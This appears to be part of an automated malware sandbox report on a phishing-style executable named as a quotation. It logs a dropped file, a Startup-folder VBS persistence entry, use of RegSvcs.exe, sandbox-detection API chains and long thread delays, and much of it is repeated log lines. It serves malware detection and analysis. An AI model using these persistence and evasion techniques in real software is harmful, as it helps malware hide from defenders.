                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 2/oC:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F30A76 push ecx; ret 1_2_00F30A89
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D80A76 push ecx; ret 2_2_00D80A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C29C30 push esp; retf 00C4h3_2_00C29D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3891E pushad ; iretd 9_2_02A3891F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A38C2F pushfd ; iretd 9_2_02A38C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A38DDF push esp; iretd 9_2_02A38DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06B561DD pushad ; ret 9_2_06B561DE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeFile created: C:\Users\user\AppData\Local\supergroup\ageless.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbsJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00F2F98E
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00FA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00FA1C41
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00D7F98E
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00DF1C41
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_1-97854
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeAPI/Special instruction interceptor: Address: 140CFA4
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeAPI/Special instruction interceptor: Address: 134B25C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599558Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596778Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595216Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594780Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594559Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594444Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594244Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594141Jump to behavior
